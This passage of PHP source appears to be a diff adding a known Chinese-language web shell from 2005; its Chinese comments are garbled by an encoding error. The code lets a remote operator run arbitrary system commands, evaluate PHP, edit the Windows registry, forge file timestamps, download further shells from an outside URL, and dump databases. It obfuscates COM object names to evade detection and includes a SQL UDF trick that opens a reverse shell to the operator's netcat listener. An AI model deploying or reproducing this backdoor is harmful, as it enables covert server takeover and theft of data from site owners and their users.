{ + if (!empty($dl)) { + $dfiles=""; + foreach ($dl AS $filepath=>$value) { + $dfiles.=$filepath.","; + } + $dfiles=substr($dfiles,0,strlen($dfiles)-1); + $dl=explode(",",$dfiles); + $zip=new PHPZip($dl); + $code=$zip->out; + header("Content-type: application/octet-stream"); + header("Accept-Ranges: bytes"); + header("Accept-Length: ".strlen($code)); + header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz"); + echo $code; + exit; + } else { + echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļþ!"; + } +} + +// Shell.Application ÔËÐгÌÐò +elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { + $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); + $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); + echo ($a=='0') ? "³ÌÐòÒѾ­³É¹¦Ö´ÐÐ!" : "³ÌÐòÔËÐÐʧ°Ü!"; +} + +// ²é¿´PHPÅäÖòÎÊý×´¿ö +elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { + echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; +} + +// ¶Áȡע²á±í +elseif(($regread) AND !empty($_POST['readregname'])) { + $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); + var_dump(@$shell->RegRead($_POST['readregname'])); +} + +// дÈë×¢²á±í +elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { + $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); + $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); + echo ($a=='0') ? "дÈë×¢²á±í½¡Öµ³É¹¦!" : "дÈë ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ°Ü!"; +} + +// ɾ³ý×¢²á±í +elseif(($regdelete) AND !empty($_POST['delregname'])) { + $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); + $a = @$shell->RegDelete($_POST['delregname']); + echo ($a=='0') ? "ɾ³ý×¢²á±í½¡Öµ³É¹¦!" : "ɾ³ý ".$_POST['delregname']." ʧ°Ü!"; +} + +else { + echo "$notice"; +} + +echo "

    \n"; +/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/ + +if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { + $tb->tableheader(); +?> + + Îļþ + ´´½¨ÈÕÆÚ + ×îºóÐÞ¸Ä + ´óС + ÊôÐÔ + ²Ù×÷ + +\n"; + echo " [$file]\n"; + echo " $ctime\n"; + echo " $mtime\n"; + echo " <dir>\n"; + echo " $dirperm\n"; + echo " | ɾ³ý | ¸ÄÃû |\n"; + echo "\n"; + $dir_i++; + } else { + if($file=="..") { + echo "\n"; + echo " ·µ»ØÉϼ¶Ä¿Â¼\n"; + echo "\n"; + } + } + } +}// while +@closedir($dirs); +?> + + + +
    +".@date("Y-m-d H:i:s",@filectime($filepath)).""; + $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; + } + @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); + echo "\n"; + echo " "; + echo ""; + echo "$file\n"; + echo " $ctime\n"; + echo " $mtime\n"; + echo " $size KB\n"; + echo " $fileperm\n"; + echo " ÏÂÔØ | ±à¼­ | ɾ³ý | ¸ÄÃû | ʱ¼ä\n"; + echo "\n"; + $file_i++; + } +}// while +@closedir($dirs); +$tb->tdbody('
    '.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','Ñ¡ÖÐÎļþ´ò°üÏÂÔØ','','submit').''.$dir_i.' ¸öĿ¼ / '.$file_i.' ¸öÎļþ
    ','center',getrowbg(),'','','6'); + +echo "
    \n"; +echo "\n"; +}// end dir + +elseif ($_GET['action'] == "editfile") { + if(empty($newfile)) { + $filename="$dir/$editfile"; + $fp=@fopen($filename,"r"); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents=htmlspecialchars($contents); + }else{ + $editfile=$newfile; + $filename = "$dir/$editfile"; + } + $action = "?dir=".urlencode($dir)."&editfile=".$editfile; + $tb->tableheader(); + $tb->formheader($action,'н¨/±à¼­Îļþ'); + $tb->tdbody('µ±Ç°Îļþ: '.$tb->makeinput('editfilename',$filename).' ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ Php´úÂë¼ÓÃÜ: '); + $tb->tdbody($tb->maketextarea('filecontent',$contents)); + $tb->makehidden('do','doeditfile'); + $tb->formfooter('1','30'); +}//end editfile + +elseif ($_GET['action'] == "rename") { + $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); + $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); + $tb->tableheader(); + $tb->formheader($action,'ÐÞ¸ÄÎļþÃû'); + $tb->makehidden('oldname',$dir."/".$nowfile); + $tb->makehidden('dir',$dir); + $tb->tdbody('µ±Ç°ÎļþÃû: '.basename($nowfile)); + $tb->tdbody('¸ÄÃûΪ: '.$tb->makeinput('newname')); + $tb->makehidden('do','rename'); + $tb->formfooter('1','30'); +}//end rename + +elseif ($_GET['action'] == "eval") { + $action = "?dir=".urlencode($dir).""; + $tb->tableheader(); + $tb->formheader(''.$action.' "target="_blank' ,'Ö´ÐÐphp½Å±¾'); + $tb->tdbody($tb->maketextarea('phpcode',$contents)); + $tb->formfooter('1','30'); +} +elseif ($_GET['action'] == "fileperm") { + $action = "?dir=".urlencode($dir)."&file=".$file; + $tb->tableheader(); + $tb->formheader($action,'ÐÞ¸ÄÎļþÊôÐÔ'); + $tb->tdbody('ÐÞ¸Ä '.$file.' µÄÊôÐÔΪ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); + $tb->makehidden('file',$file); + $tb->makehidden('dir',urlencode($dir)); + $tb->makehidden('do','editfileperm'); + $tb->formfooter('1','30'); +}//end fileperm + +elseif ($_GET['action'] == "newtime") { + $action = "?dir=".urlencode($dir); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + $tb->tableheader(); + $tb->formheader($action,'¿Ë¡Îļþ×îºóÐÞ¸Äʱ¼ä'); + $tb->tdbody("ÐÞ¸ÄÎļþ: ".$tb->makeinput('curfile',$file,'readonly')." ¡ú Ä¿±êÎļþ: ".$tb->makeinput('tarfile','ÐèÌîÍêÕû·¾¶¼°ÎļþÃû'),'center','2','30'); + $tb->makehidden('do','domodtime'); + $tb->formfooter('','30'); + $tb->formheader($action,'×Ô¶¨ÒåÎļþ×îºóÐÞ¸Äʱ¼ä'); + $tb->tdbody('
    • ÓÐЧµÄʱ¼ä´ÁµäÐÍ·¶Î§ÊÇ´Ó¸ñÁÖÍþÖÎʱ¼ä 1901 Äê 12 Ô 13 ÈÕ ÐÇÆÚÎå 20:45:54 µ½ 2038Äê 1 Ô 19 ÈÕ ÐÇÆÚ¶þ 03:14:07
      (¸ÃÈÕÆÚ¸ù¾Ý 32 λÓзûºÅÕûÊýµÄ×îСֵºÍ×î´óÖµ¶øÀ´)
    • ˵Ã÷: ÈÕÈ¡ 01 µ½ 30 Ö®¼ä, ʱȡ 0 µ½ 24 Ö®¼ä, ·ÖºÍÃëÈ¡ 0 µ½ 60 Ö®¼ä!
    ','left'); + $tb->tdbody('µ±Ç°ÎļþÃû: '.$file); + $tb->makehidden('curfile',$file); + $tb->tdbody('ÐÞ¸ÄΪ: '.$tb->makeinput('year','1984','','text','4').' Äê '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' Ô '.$tb->makeinput('data','18','','text','2').' ÈÕ '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' ·Ö '.$tb->makeinput('second','00','','text','2').' Ãë','center','2','30'); + $tb->makehidden('do','modmytime'); + $tb->formfooter('1','30'); +}//end newtime + +elseif ($_GET['action'] == "shell") { + $action = "??action=shell&dir=".urlencode($dir); + $tb->tableheader(); + $tb->tdheader('WebShell Mode'); + if (substr(PHP_OS, 0, 3) == 'WIN') { + $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; + $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; + echo "
    \n"; + $tb->tdbody('ÎÞ»ØÏÔÔËÐгÌÐò ¡ú Îļþ: '.$tb->makeinput('program',$program).' ²ÎÊý: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); + $tb->makehidden('do','programrun'); + echo "
    \n"; + } + echo "
    \n"; + if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; + $tb->tdbody('Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ. '); + $tb->tdbody('proc_openº¯Êý¼ÙÉè²»ÊÇĬÈϵÄwinntϵͳÇë×ÔÐÐÉèÖÃʹÓÃ,×ÔÐÐÐ޸ļǵÃдÍ˳ö,·ñÔò»áÔÚÖ÷»úÉÏÁôÏÂÒ»¸öδ½áÊøµÄ½ø³Ì.'); + $tb->tdbody('proc_openº¯ÊýҪʹÓõÄcmd³ÌÐòµÄλÖÃ:'.$tb->makeinput('cmd',$cmd,'','text','30').'(ÒªÊÇÊÇlinuxϵͳ»¹ÊÇ´ó´óÃÇ×Ô¼ºÐ޸İÉ)'); + $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); + $tb->tdbody('Ñ¡ÔñÖ´Ðк¯Êý: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' ÊäÈëÃüÁî: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); +?> + + + +
    + +tableheader(); + $tb->formheader($action,'¶Áȡע²á±í'); + $tb->tdbody('¼üÖµ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','¶ÁÈ¡','','submit'),'center','2','50'); + echo ""; + + $tb->formheader($action,'дÈë×¢²á±í'); + $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); + $tb->tdbody('¼üÖµ: '.$tb->makeinput('writeregname',$registre,'','text','56').' ÀàÐÍ: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' Öµ: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','дÈë','','submit'),'center','2','50'); + echo ""; + + $tb->formheader($action,'ɾ³ý×¢²á±í'); + $tb->tdbody('¼üÖµ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ³ý','','submit'),'center','2','50'); + echo ""; + $tb->tablefooter(); +}//end reg +elseif ($_GET['action'] == "downloads"){ +$action = '?action=dir'; + $tb->tableheader(); + $tb->formheader($action,'httpÎļþÏÂÔØģʽ'); + $tb->tdbody('Äã¿ÉÒÔʹÓñ¾¹¦ÄÜ°ÑһЩС¹¤¾ßÒÔhttp·½Ê½ÏÂÔص½´Ë·þÎñÆ÷','center'); + $tb->tdbody('ÎļþλÖÃ: '.$tb->makeinput('durl','http://blog.blackwoods.com/miyabi/myshell.txt','','text','70').'
    ÏÂÔص½:'.$tb->makeinput('path','./myshell.php','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','ÏÂÔØ','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('×¢Òâ,¼ÙÉèÎļþÌ«´ó½«ÎÞ·¨ÏÂÔØÏÂÀ´¶øÇÒÓ°ÏìÖ´ÐÐËÙ¶È.','center'); + $tb->tablefooter(); +} +elseif ($_GET['action'] == "search"){ +$action = '?dir='.$dir.''; + $tb->tableheader(); + $tb->formheader($action,'Îļþ²éÕÒ'); + $tb->tdbody('Äã¿ÉÒÔʹÓñ¾¹¦ÄܲéÕÒÒ»¸öĿ¼ÏµÄÎļþÀïÄÄдÎļþ°üº¬×Źؼü´Ê!','center'); + $tb->tdbody('ÎļþλÖÃ: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'
    ²éÕÒÎÄ×Ö:'.$tb->makeinput('oldkey','ϼú','','text','60').''.$tb->makehidden('do','search').'
    ÊÇ·ñ¼ÆËãËùÔÚÐÐ (´Ë¹¦ÄܺÍÏÂÃæÒ»¸ö¹¦ÄÜ»áÓ°ÏìÖ´ÐÐËٶȣ¬ËùÒÔĬÈϹرÕ!)
    Êʵ±¶ÁÈ¡: ¶ÁÈ¡¹Ø¼ü´ÊÇ°'.$tb->makeinput('beline','0','','text','3').'¸ö×Ö·û '.$tb->makehidden('dir',''.$dir.'').'µ½¹Ø¼ü´ÊºóµÚ'.$tb->makeinput('endline','10','','text','3').'¸ö×Ö·û... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','¿ªÊ¼²éÕÒÎļþ','','submit'),'center','1','35'); + echo ""; + $tb->tdbody('Çë±íÌ«´óµÄĿ¼ÁË£¬ÂýÂýä¯ÀÀÂýÂýÕҺò»ºÃÂï.¼ÙÉèÑ¡¶¨¼ÆËãÐÐËٶȻáÂý¡£ÏÔʾ[ËùÔÚÐÐ/×ܹ²¶àÉÙÐÐ]','center'); + $tb->tablefooter(); +} +elseif ($_GET['action'] == "proxy") { + $action = '?action=proxy'; + $tb->tableheader(); + $tb->formheader($action,'ÔÚÏß´úÀí','proxyframe'); + $tb->tdbody('
    • Óñ¾¹¦ÄܽöʵÏÖ¼òµ¥µÄ HTTP ´úÀí,²»»áÏÔʾʹÓÃÏà¶Ô·¾¶µÄͼƬ¡¢Á´½Ó¼°CSSÑùʽ±í.
    • Óñ¾¹¦ÄÜ¿ÉÒÔͨ¹ý±¾·þÎñÆ÷ä¯ÀÀÄ¿±êURL,µ«²»Ö§³Ö SQL Injection ̽²âÒÔ¼°Ä³Ð©ÌØÊâ×Ö·û.
    • Óñ¾¹¦ÄÜä¯ÀÀµÄ URL,ÔÚÄ¿±êÖ÷»úÉÏÁôϵÄIP¼Ç¼ÊÇ : '.$_SERVER['REMOTE_ADDR'].'
    ','left'); + $tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','ä¯ÀÀ','','submit'),'center','1','40'); + $tb->tdbody(''); + echo ""; + $tb->tablefooter(); +}//end proxy + +elseif ($_GET['action'] == "sql") { + $action = '?action=sql'; + + $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; + $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; + $dbpassword = $_POST['dbpassword']; + $dbname = $_POST['dbname']; + $sql_query = $_POST['sql_query']; +if($type=="fun"){ +$sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\Winnt\\Mix.dll'; +select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*Õâ¸ö×îºÃÏÈÖ´ÐÐÁËÉÏÃæÒ»¾äÔÙÓÃ*/ +/*ÇëÔÚÄã¼ÆËã»úÉÏÖ´ÐÐ nc -vv -l -p 8888*/"; +} + $tb->tableheader(); + $tb->formheader($action,'Ö´ÐÐ SQL Óï¾ä'); + $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit')); + $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); + $tb->makehidden('do','query'); + $tb->formfooter('1','30'); +}//end sql query + +elseif ($_GET['action'] == "sqlbak") { + $action = '?action=sqlbak'; + $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; + $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; + $dbpassword = $_POST['dbpassword']; + $dbname = $_POST['dbname']; + $tb->tableheader(); + $tb->formheader($action,'±¸·Ý MySQL Êý¾Ý¿â'); + $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit')); + @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); + $tables = @mysql_list_tables($dbname); + while ($table = @mysql_fetch_row($tables)) { + $cachetables[$table[0]] = $table[0]; + } + @mysql_free_result($tables); + if (empty($cachetables)) { + $tb->tdbody('ÄúûÓÐÁ¬½ÓÊý¾Ý¿â or µ±Ç°Êý¾Ý¿âûÓÐÈκÎÊý¾Ý±í'); + } else { + $tb->tdbody('
    ÇëÑ¡Ôñ±í:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
    ±¸·ÝÊý¾ÝËù±£´æµÄ·¾¶:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
    Ö±½ÓÏÂÔص½±¾µØ (ÊʺÏÊý¾ÝÁ¿½ÏСµÄÊý¾Ý¿â)
    '); + $tb->makehidden('do','backupmysql'); + $tb->formfooter('0','30'); + } + $tb->tablefooter(); + @mysql_close(); +}//end sql backup + +elseif ($_GET['action'] == "phpenv") { + $user = " ÒÔÃâcrushµã´Ë»ñÈ¡µ±Ç°½ø³ÌÓû§Ãû "; + $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊÐíÉÏ´«"; + $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; + if ($dis_func == "") { + $dis_func = "No"; + }else { + $dis_func = str_replace(" ","
    ",$dis_func); + $dis_func = str_replace(",","
    ",$dis_func); + } + $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; + $info = array( + 0 => array("µ±Ç°php½ø³ÌÓû§",$user), + 1 => array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS), + 2 => array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())), + 3 => array("·þÎñÆ÷ÓòÃû","".$_SERVER['SERVER_NAME'].""), + 4 => array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER['SERVER_NAME'])), + 5 => array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER['SERVER_SOFTWARE']), + 7 => array("Web·þÎñ¶Ë¿Ú",$_SERVER['SERVER_PORT']), + 8 => array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name())), + 9 => array("PHP°æ±¾",PHP_VERSION), + 10 => array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode")), + 11 => array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail), + 12 => array("±¾Îļþ·¾¶",__FILE__), + 13 => array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen")), + 14 => array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")), + 15 => array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors")), + 16 => array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")), + 17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), + 18 => array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")), + 19 => array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size")), + 20 => array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize), + 21 => array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"), + 22 => array("±»½ûÓõĺ¯Êý disable_functions",$dis_func), + 23 => array("phpinfo()",$phpinfo), + 24 => array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), + 25 => array("ͼÐδ¦Àí GD Library",getfun("imageline")), + 26 => array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close")), + 27 => array("MySQLÊý¾Ý¿â",getfun("mysql_close")), + 28 => array("SyBaseÊý¾Ý¿â",getfun("sybase_close")), + 29 => array("OracleÊý¾Ý¿â",getfun("ora_close")), + 30 => array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff")), + 31 => array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match")), + 32 => array("PDFÎĵµÖ§³Ö",getfun("pdf_close")), + 33 => array("Postgre SQLÊý¾Ý¿â",getfun("pg_close")), + 34 => array("SNMPÍøÂç¹ÜÀíЭÒé",getfun("snmpget")), + 35 => array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose")), + 36 => array("XML½âÎö",getfun("xml_set_object")), + 37 => array("FTP",getfun("ftp_login")), + 38 => array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close")), + 39 => array("SessionÖ§³Ö",getfun("session_start")), + 40 => array("SocketÖ§³Ö",getfun("fsockopen")), + ); + $tb->tableheader(); + echo "
    \n"; + $tb->tdbody('²é¿´PHPÅäÖòÎÊý×´¿ö','left','1','30','style="padding-left: 5px;"'); + $tb->tdbody('ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','²é¿´','','submit'),'left','2','30','style="padding-left: 5px;"'); + $tb->makehidden('do','viewphpvar'); + echo "
    \n"; + $hp = array(0=> '·þÎñÆ÷ÌØÐÔ', 1=> 'PHP»ù±¾ÌØÐÔ', 2=> '×é¼þÖ§³Ö×´¿ö'); + for ($a=0;$a<3;$a++) { + $tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"'); +?> + + + +\n"; + } + } elseif ($a == 1) { + for ($i=13;$i<=24;$i++) { + echo "\n"; + } + } elseif ($a == 2) { + for ($i=25;$i<=40;$i++) { + echo "\n"; + } + } +?> +
    ".$info[$i][0]."".$info[$i][1]."
    ".$info[$i][0]."".$info[$i][1]."
    ".$info[$i][0]."".$info[$i][1]."
    + + +"; +}//end phpenv +?> +
    + + + + + +
    Copyright (C) 2005 Sai All Rights Reserved.
    +
    + + + + + +
    +Password: + + +
    +read()) { + if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { + @chmod("$deldir/$file",0777); + deltree("$deldir/$file"); + } + if (is_file("$deldir/$file")) { + @chmod("$deldir/$file",0777); + @unlink("$deldir/$file"); + } + } + $mydir->close(); + @chmod("$deldir",0777); + return (@rmdir($deldir)) ? 1 : 0; + } + + // Åж϶ÁдÇé¿ö + function dir_writeable($dir) { + if (!is_dir($dir)) { + @mkdir($dir, 0777); + } + if(is_dir($dir)) { + if ($fp = @fopen("$dir/test.txt", 'w')) { + @fclose($fp); + @unlink("$dir/test.txt"); + $writeable = 1; + } else { + $writeable = 0; + } + } + return $writeable; + } + + // ±í¸ñÐмäµÄ±³¾°É«Ìæ»» + function getrowbg() { + global $bgcounter; + if ($bgcounter++%2==0) { + return "firstalt"; + } else { + return "secondalt"; + } + } + + // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ + function getPath($mainpath, $relativepath) { + global $dir; + $mainpath_info = explode('/', $mainpath); + $relativepath_info = explode('/', $relativepath); + $relativepath_info_count = count($relativepath_info); + for ($i=0; $i<$relativepath_info_count; $i++) { + if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; + if ($relativepath_info[$i] == '..') { + $mainpath_info_count = count($mainpath_info); + unset($mainpath_info[$mainpath_info_count-1]); + continue; + } + $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; + } //end for + return implode('/', $mainpath_info); + } + + // ¼ì²éPHPÅäÖòÎÊý + function getphpcfg($varname) { + switch($result = get_cfg_var($varname)) { + case 0: + return "No"; + break; + case 1: + return "Yes"; + break; + default: + return $result; + break; + } + } + + // ¼ì²éº¯ÊýÇé¿ö + function getfun($funName) { + return (false !== function_exists($funName)) ? "Yes" : "No"; + } + + // ѹËõ´ò°üÀà + class PHPZip{ + var $out=''; + function PHPZip($dir) { + if (@function_exists('gzcompress')) { + $curdir = getcwd(); + if (is_array($dir)) $filelist = $dir; + else{ + $filelist=$this -> GetFileList($dir);//ÎļþÁбí + foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); + } + if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); + else chdir($curdir); + if (count($filelist)>0){ + foreach($filelist as $filename){ + if (is_file($filename)){ + $fd = fopen ($filename, "r"); + $content = @fread ($fd, filesize ($filename)); + fclose ($fd); + if (is_array($dir)) $filename = basename($filename); + $this -> addFile($content, $filename); + } + } + $this->out = $this -> file(); + chdir($curdir); + } + return 1; + } + else return 0; + } + + // »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí + function GetFileList($dir){ + static $a; + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if($file!='.' && $file!='..'){ + $f=$dir .'/'. $file; + if(is_dir($f)) $this->GetFileList($f); + $a[]=$f; + } + } + closedir($dh); + } + } + return $a; + } + + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } // end if + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + + function addFile($data, $name, $time = 0) { + $name = str_replace('\\', '/', $name); + + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + + $fr .= $zdata; + + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + + $this -> ctrl_dir[] = $cdrec; + } + + function file() { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } + } + + // ±¸·ÝÊý¾Ý¿â + function sqldumptable($table, $fp=0) { + $tabledump = "DROP TABLE IF EXISTS $table;\n"; + $tabledump .= "CREATE TABLE $table (\n"; + + $firstfield=1; + + $fields = mysql_query("SHOW FIELDS FROM $table"); + while ($field = mysql_fetch_array($fields)) { + if (!$firstfield) { + $tabledump .= ",\n"; + } else { + $firstfield=0; + } + $tabledump .= " $field[Field] $field[Type]"; + if (!empty($field["Default"])) { + $tabledump .= " DEFAULT '$field[Default]'"; + } + if ($field['Null'] != "YES") { + $tabledump .= " NOT NULL"; + } + if ($field['Extra'] != "") { + $tabledump .= " $field[Extra]"; + } + } + 